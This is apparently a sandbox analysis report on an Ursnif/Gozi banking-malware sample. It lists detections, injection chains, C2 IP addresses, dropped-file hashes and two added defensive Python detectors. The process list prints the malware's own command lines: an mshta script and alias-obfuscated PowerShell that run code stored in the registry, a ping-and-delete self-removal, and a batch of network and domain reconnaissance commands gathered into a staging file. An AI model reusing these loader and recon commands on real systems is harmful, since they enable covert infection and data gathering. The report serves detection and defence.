Analysis Overview
SHA256
0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
Threat Level: Known bad
The file d41d05cc157f874f89c574c74c0e2c58 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
Deletes itself
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Runs net.exe
Enumerates processes with tasklist
Discovers systems in the same network
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious behavior: CmdExeWriteProcessMemorySpam
Gathers system information
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-22 15:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-22 15:41
Reported
2022-03-22 15:47
Platform
win7-20220311-en
Max time kernel
4294180s
Max time network
120s
Command Line
Signatures
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe | C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe |
| PID 532 set thread context of 1192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1192 set thread context of 1912 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 1912 set thread context of 1604 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 1192 set thread context of 1452 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\71B8.bi1"
C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\71B8.bi1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\B64C.bin1 > C:\Users\Admin\AppData\Local\Temp\B64C.bin & del C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
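The mshta and PowerShell command lines above are the two loader stages: mshta eval()s a registry value read with regread(), and PowerShell hides gp (Get-ItemProperty) and iex (Invoke-Expression) behind random aliases to run a second value under the same HKCU key; cmd.exe then deletes the dropper after five pings. The parser below turns those command lines into hunting indicators. It is an added example, not part of the sandbox report or any Triage output; the command lines are copied from this page, while the function names, the STAGING_PARENT constant and the result shape are assumptions.

```python
"""Extract the registry staging key, value names and self-delete target from
the Ursnif/Gozi loader command lines shown in the process list above.
Added example, not part of the sandbox report."""
import re

# Copied verbatim from the behavioral1 and behavioral2 process lists.
MSHTA_B1 = r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"'''
PS_B1 = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))'''
MSHTA_B2 = r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"'''
SELFDEL_B1 = r'''"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"'''

# Assumed hunting scope: the GUID subkey differs per infection (compare the
# two mshta lines), so hunt on the parent key rather than a fixed GUID.
STAGING_PARENT = r"HKCU\Software\AppDataLow\Software\Microsoft"

REGREAD_RE = re.compile(r"regread\('([^']+)'\)", re.I)
ALIAS_RE = re.compile(r"new-alias\s+-name\s+(\S+)\s+-value\s+([\w-]+)", re.I)
PS_KEY_RE = re.compile(r'"(HKCU:[^"]+)"\)\.(\w+)')
SELFDEL_RE = re.compile(
    r'ping\s+(?:localhost|127\.0\.0\.1)\s+-n\s+(\d+)\s*&&\s*del\s+"?([^"]+?)"?\s*$', re.I)


def decode_js_string(s):
    # Collapse JScript string escapes: \\ -> \ and \X -> X, which is why the
    # odd-looking HKCU\\\Software in the HTA is HKCU\Software once mshta runs it.
    return re.sub(r"\\(.)", r"\1", s)


def parse_mshta_loader(cmdline):
    """Stage 1: mshta about:<hta:...> that eval()s a registry value."""
    low = cmdline.lower()
    if "mshta" not in low or "about:" not in low:
        return None
    m = REGREAD_RE.search(cmdline)
    if not m:
        return None
    key, _, value = decode_js_string(m.group(1)).rpartition("\\")
    return {"stage": "mshta", "key": key, "value": value,
            "evals_registry": "eval(" in low and "regread(" in low}


def parse_powershell_loader(cmdline):
    """Stage 2: gp/iex hidden behind new-alias, reading a second value."""
    aliases = {n.lower(): v.lower() for n, v in ALIAS_RE.findall(cmdline)}
    m = PS_KEY_RE.search(cmdline)
    if not m:
        return None
    return {"stage": "powershell",
            "key": m.group(1).replace("HKCU:", "HKCU\\", 1),
            "value": m.group(2), "aliases": aliases,
            "hidden_iex": "iex" in aliases.values() and "gp" in aliases.values()}


def parse_self_delete(cmdline):
    """`ping localhost -n N && del <dropper>`: N pings are the delay timer."""
    m = SELFDEL_RE.search(cmdline)
    return {"delay_pings": int(m.group(1)), "deleted": m.group(2)} if m else None


def staging_indicators(*cmdlines):
    """(key, value) pairs under STAGING_PARENT, ready for `reg query`."""
    out = set()
    for c in cmdlines:
        r = parse_mshta_loader(c) or parse_powershell_loader(c)
        if r and r["key"].lower().startswith(STAGING_PARENT.lower()):
            out.add((r["key"], r["value"]))
    return sorted(out)


if __name__ == "__main__":
    for key, value in staging_indicators(MSHTA_B1, PS_B1, MSHTA_B2):
        print(f'reg query "{key}" /v {value}')
    print(parse_self_delete(SELFDEL_B1))
```

The two stages of one detonation resolve to the same GUID key (OperatorMask and ClassControl under 1F204AFB-...), while the second detonation uses a different GUID and different value names, so a host hunt should enumerate every subkey of the parent and dump any value whose contents begin with script or PowerShell text.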
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 146.70.35.138:80 | 146.70.35.138 | tcp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| BE | 193.56.146.148:80 | 193.56.146.148 | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| CA | 67.43.234.14:80 | 67.43.234.14 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
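Each discovery tool in the process list runs in its own cmd.exe and appends to one %TEMP% file (B64C.bin1), which is finally copied to B64C.bin and deleted; the preceding nslookup of myip.opendns.com against resolver1.opendns.com is the external-IP check that appears in the network table as UDP/53 to 208.67.222.222. Seen one process at a time these are ordinary admin commands, so the useful detection is the correlation: several distinct discovery tools writing to the same output file within a short window. The script below does that over process-creation events. It is an added example, not part of the sandbox report; the command lines are constructed from the behavioral1 list, and the timestamps, PIDs, event shape, threshold and window are assumptions (PID 1192 is the Explorer.EXE from the SetThreadContext table, used here as the parent).

```python
"""Correlate the Ursnif/Gozi discovery chain (one cmd.exe per tool, all
redirected into the same %TEMP% file) into a single finding.
Added example, not part of the sandbox report."""
import re
from collections import defaultdict
from dataclasses import dataclass

DISCOVERY_TOOLS = {"systeminfo", "net", "net1", "nslookup", "tasklist",
                   "driverquery", "reg", "nltest", "ipconfig", "whoami"}

# External IP check seen in the network table (UDP/53 to resolver1.opendns.com).
EXTERNAL_IP_RE = re.compile(
    r"nslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com", re.I)
# Unwrap `cmd [/U] /C "<inner>"` and split <inner> into tool + redirect target.
CMD_WRAPPER_RE = re.compile(
    r'^\s*"?cmd(?:\.exe)?"?\s+(?:/U\s+)?/C\s+"?(.*?)"?\s*$', re.I)
INNER_RE = re.compile(r'^\s*([A-Za-z0-9]+)(?:\.exe)?\b.*?>>?\s*"?([^"\s]+)', re.I | re.S)
DEL_RE = re.compile(r'\bdel\s+"?([^"\s]+)', re.I)


@dataclass
class ProcEvent:          # assumed shape of a process-creation record
    ts: float
    pid: int
    ppid: int
    cmdline: str


def parse_redirected_command(cmdline):
    """Return (tool, output_path) for `cmd /C "tool args >> path"`, else None."""
    m = CMD_WRAPPER_RE.match(cmdline)
    inner = m.group(1) if m else cmdline
    m2 = INNER_RE.match(inner)
    return (m2.group(1).lower(), m2.group(2)) if m2 else None


def correlate(events, min_tools=4, window_s=120):
    """Group redirected discovery commands by output file and alert when at
    least `min_tools` distinct tools feed one file within `window_s` seconds."""
    by_target = defaultdict(list)
    findings = []
    for e in events:
        if EXTERNAL_IP_RE.search(e.cmdline):
            findings.append({"type": "external_ip_lookup", "pid": e.pid, "ppid": e.ppid})
        parsed = parse_redirected_command(e.cmdline)
        if not parsed:
            continue
        tool, target = parsed
        if tool in DISCOVERY_TOOLS:
            by_target[target].append((e.ts, tool, e.ppid))
        elif tool == "type" and (d := DEL_RE.search(e.cmdline)):
            # `type X.bin1 > X.bin & del X.bin1`: staging file finalised for exfil
            findings.append({"type": "collection_consolidated", "pid": e.pid,
                             "from": d.group(1), "to": target})
    for target, rows in by_target.items():
        rows.sort()
        tools = sorted({t for _, t, _ in rows})
        span = rows[-1][0] - rows[0][0]
        if len(tools) >= min_tools and span <= window_s:
            findings.append({"type": "discovery_chain", "output": target,
                             "tools": tools, "span_s": span,
                             "parents": sorted({p for _, _, p in rows})})
    return findings


# Constructed sample: command lines from the behavioral1 process list plus one
# benign control (a single ipconfig from a different parent).
T = r"C:\Users\Admin\AppData\Local\Temp"
BIN1 = rf"{T}\B64C.bin1"
SAMPLE_CMDLINES = [
    rf'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > {T}\71B8.bi1"',
    rf'cmd /C "systeminfo.exe > {BIN1}"',
    rf'cmd /C "echo -------- >> {BIN1}"',
    rf'cmd /C "net view >> {BIN1}"',
    rf'cmd /C "nslookup 127.0.0.1 >> {BIN1}"',
    rf'cmd /C "tasklist.exe /SVC >> {BIN1}"',
    rf'cmd /C "driverquery.exe >> {BIN1}"',
    rf'cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> {BIN1}"',
    rf'cmd /C "nltest /domain_trusts >> {BIN1}"',
    rf'cmd /U /C "type {BIN1} > {T}\B64C.bin & del {BIN1}"',
    r'cmd /C "ipconfig /all > C:\Users\Admin\Desktop\net.txt"',
]
SAMPLE_EVENTS = [ProcEvent(ts=float(i), pid=2000 + i, ppid=1192 if i < 10 else 3000, cmdline=c)
                 for i, c in enumerate(SAMPLE_CMDLINES)]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f)
```

The threshold of four tools is deliberately below the seven the sample uses, so a trimmed variant still fires, while the single ipconfig control does not; the 71B8.bi1 lookup is reported on its own because the external-IP check is a distinct, earlier behaviour. On Windows the same logic maps directly onto Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.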
Files
memory/976-54-0x0000000000400000-0x000000000040D000-memory.dmp
memory/976-56-0x0000000000400000-0x000000000040D000-memory.dmp
memory/976-58-0x0000000000400000-0x000000000040D000-memory.dmp
memory/976-59-0x0000000000300000-0x0000000000302000-memory.dmp
memory/532-60-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp
memory/532-61-0x000007FEF4810000-0x000007FEF536D000-memory.dmp
memory/532-62-0x000007FEF2920000-0x000007FEF32BD000-memory.dmp
memory/532-63-0x00000000025DB000-0x00000000025FA000-memory.dmp
memory/532-64-0x00000000025D0000-0x00000000025D2000-memory.dmp
memory/532-66-0x00000000025D2000-0x00000000025D4000-memory.dmp
memory/532-65-0x000007FEF2920000-0x000007FEF32BD000-memory.dmp
memory/532-67-0x00000000025D4000-0x00000000025D7000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline
| MD5 | 15beada1ff111d2111664d37aaf6a3d4 |
| SHA1 | 3b3734ea064429e762cd5486d0fba04face5b383 |
| SHA256 | a889253f6e529a3d1e1c73161d517cb354df6ab9f610dcdac4ccce92d8b0d57f |
| SHA512 | 23af14c5a9ae82856dd6d218fbcde47eb931ba4d86f3b137a13736de57a56319f87190873be7fd96908f175f4ae256ce3ada379cf2a3c55a65ff0b5c6e9d43d1 |
\??\c:\Users\Admin\AppData\Local\Temp\tmcimu1x.0.cs
| MD5 | 0b7537cf8128ca1320d7bf219bb65b46 |
| SHA1 | 33ca68f06067df84baa078137f1285102d30cb3a |
| SHA256 | 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8 |
| SHA512 | 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp
| MD5 | 6155564f545bc7f2cb1fbf3bf402fc0f |
| SHA1 | 3fa34f6832a5d791a07eccf2194017f5550b92ae |
| SHA256 | 6bc73eab373f815cd2c2ee1bc8a5f6446bccf546823d02034062de05986e92f7 |
| SHA512 | 911014c774ad35efd2fcffadf49e7ad66b4fcd5563a1139378edd926ffd2f6711a449d5da7dd67b24813251dcaba7d5b51ebb022034b4f9c017938007f762503 |
C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp
| MD5 | 2130a1b34a8cd0007d613fa90e2149ca |
| SHA1 | 1bd6e3e50e720e872e9905a8a7e513c1c0ad957e |
| SHA256 | f4fa8084ddadf6b9c38b1ab21c5d7495aac2e2e7dc2930f5a85a721df69cbbe7 |
| SHA512 | 6243fb2dd1495ed6063c2a0ba6616a1688be1b6cab2553cac663f76829b1aa3d5e0addcdbafc228f26d04e234789b9011b6b5892cb2c165d65602d9dc6a4bcb4 |
C:\Users\Admin\AppData\Local\Temp\tmcimu1x.dll
| MD5 | 34da9fbc2b5780708c9b9297ac7a0099 |
| SHA1 | f26f5d59c64cd80f4130e91deda368ffa563050b |
| SHA256 | 358e8b87028e904eb6c077d59cd3d6f522520a17000eb570602f8c7d5f1f970a |
| SHA512 | 7d83f60f41a9ad222f547453f471e2258127908ee63c19016e9b95c4ba971975e456082d4604470f8e7101428ffad6a23e9c1e469a0c7e538bb80f41e0345d92 |
C:\Users\Admin\AppData\Local\Temp\tmcimu1x.pdb
| MD5 | 5e900832af8d48e74256b774cc47227b |
| SHA1 | 37a88311c763435c8c836b888f9b5c0bf4c1978a |
| SHA256 | 63692d815920b4807045b051d001f9f1766ffba38db20d96fc2a0c5c04229a72 |
| SHA512 | f1d7d9c6f3697e4b50ed2f68f8d5b462703532e457536700154afc7c109bc2e535ee5753cec5fed353e803d313b8acdc74c73caaef734e0c83b1174590366d68 |
\??\c:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline
| MD5 | 40dea05550e17a81fe9b98e76d0e5a72 |
| SHA1 | 03367f9c3dc8a0bf6924fadd7454615aa18437b9 |
| SHA256 | e984e36cff12604a2c56c30270599c39f963b0bf28a72399058cb0aa843ab943 |
| SHA512 | a69bcfc8fd99a5e3afc2b8e8cd01860fa898b1ac705c17a9c6302990d81ea3047b185881881578d0e65f0d11748dffe635865d46871bc5a22a17ceb5e57476d7 |
\??\c:\Users\Admin\AppData\Local\Temp\x0tccqdc.0.cs
| MD5 | 35b3f48ba529849ae98e5f2c89b802f6 |
| SHA1 | e6ac7f0dff73e320ab7c09f5abb45dede87cfe81 |
| SHA256 | f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61 |
| SHA512 | b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp
| MD5 | 85f7524f460ef4f7956c4cc6a4fcd64d |
| SHA1 | 7a3b327c2540d11d1dd814d2413311d0e84d5379 |
| SHA256 | 03a94a3b0df48af69e29df962a0d1d9a809adafe1083c5efdcd7da896d8dcade |
| SHA512 | b956c74d46f7d823cc3bd5aff1571ff02782de3a016729018359962796d9361b3a29cf61a5898b81a2dab51dd2e92830dc80ae72ec16cadd3d84fe95f611cfe8 |
C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp
| MD5 | 9a367b111333f6600f238af34f8f5baf |
| SHA1 | 96f5271d8af02af8edf8a93ebdf5ee72d13f71a1 |
| SHA256 | fbf7317bce44bed255a35ec05738a5c47e1ff7de889046afd1526f8781b900e1 |
| SHA512 | ac7443ce7e9b1e476bfb77239209a36e6e6b3fb0e0fdd806c60c41c8883e02f782b6d62c91e0739ed655cfcfb5ad9ac06299b4a2768d16412ccecb0cd5294290 |
C:\Users\Admin\AppData\Local\Temp\x0tccqdc.dll
| MD5 | 46526cabf88f54424ecd4d4b5172ead9 |
| SHA1 | 38a5e9896a7ba474737fcd98bcf4689a7cd3083f |
| SHA256 | 9ab38ff5d12836ed280c179fa3b0f6ee4aa2e3472bec63b13e86fd01106c3f78 |
| SHA512 | db155e743c2bd8fe12850787ae11ea0e1cb936a3878e5d8613fb6e4259ab11cdee3229ed7f4c533b5f9489dcd4b15e04d0b827ba8a19338001803a55c22e5ff9 |
C:\Users\Admin\AppData\Local\Temp\x0tccqdc.pdb
| MD5 | 9943a97c2546a933ec8061d3a2c7f20d |
| SHA1 | 24529d1927e59e8bb8a8a9707ee6dfc6a111030a |
| SHA256 | 5eb093c79ea27223a418c333a7e0c08d91b162405053c2e05fa8cd88eec75069 |
| SHA512 | 77ce76e60644fbc753b4026fe2c247012b7238a1d35747e6ecc518b097d7b282576aaac15c679180377e3aa5c86e49f70709c186c7721c2a97b80735d6bbb3e8 |
memory/532-80-0x000000001B660000-0x000000001B6A4000-memory.dmp
memory/1912-81-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/1192-82-0x0000000002230000-0x0000000002231000-memory.dmp
memory/1192-83-0x00000000043A0000-0x0000000004458000-memory.dmp
memory/1912-84-0x0000000000310000-0x00000000003C8000-memory.dmp
memory/1604-86-0x0000000000180000-0x0000000000238000-memory.dmp
memory/1604-85-0x0000000000440000-0x0000000000441000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\71B8.bi1
| MD5 | 4f6429322fdfd711b81d8824b25fcd9c |
| SHA1 | f7f917b64dd43b620bacd21f134d430d3c406aec |
| SHA256 | d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8 |
| SHA512 | e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816 |
C:\Users\Admin\AppData\Local\Temp\71B8.bi1
| MD5 | 4f6429322fdfd711b81d8824b25fcd9c |
| SHA1 | f7f917b64dd43b620bacd21f134d430d3c406aec |
| SHA256 | d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8 |
| SHA512 | e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816 |
memory/1452-89-0x0000000000280000-0x000000000032A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 16a78e06ec1b6b7397cd605b06803c30 |
| SHA1 | 9cd7393bb635ac0b2bee2bd49a06c61c182abeb5 |
